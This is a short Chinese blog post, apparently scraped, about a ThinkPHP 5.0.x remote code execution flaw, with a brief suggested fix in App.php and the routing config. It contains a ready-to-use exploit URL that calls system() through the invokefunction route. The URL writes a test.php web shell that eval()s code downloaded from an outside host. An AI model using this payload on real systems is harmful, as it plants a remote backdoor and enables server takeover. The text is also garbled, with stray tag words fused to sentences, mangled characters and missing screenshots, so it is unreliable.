THINKPHP5近期暴露的漏洞

這個THINKPHP5的漏洞涉及好幾個版本,我測試中5.0.21和5.0.22都有,聽說是5.0 ~ 5.0.23之間的版本都存在,這個漏洞能夠執行寫文件的操做。php

固然了,趕忙升級框架到安全版本是比較好的方式,不過我這邊測試了一下,發現確實能夠經過url訪問注入進行執行寫文件操做,例如thinkphp

http://你的域名/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^<?php%20@eval(file_get_contents("http%3a%2f%2fcqy666.cn%2fphp.jpg"))?^>>test.php安全

以後在public下面發現了一個PHP文件 是 test.phpapp

內容以下框架

訪問test.php發現測試

我本地執行是這樣的url

 

 而後就沒有而後了 多麼可怕!blog

網上有人說的解決方案是找到 thinkphp/library/think/App.php文件第556行那裏路由

改成get

對控制器進行一次過濾,固然爲了保險仍是要把配置的路由那裏改一下

'url_route_on'           => true,
相關文章
相關標籤/搜索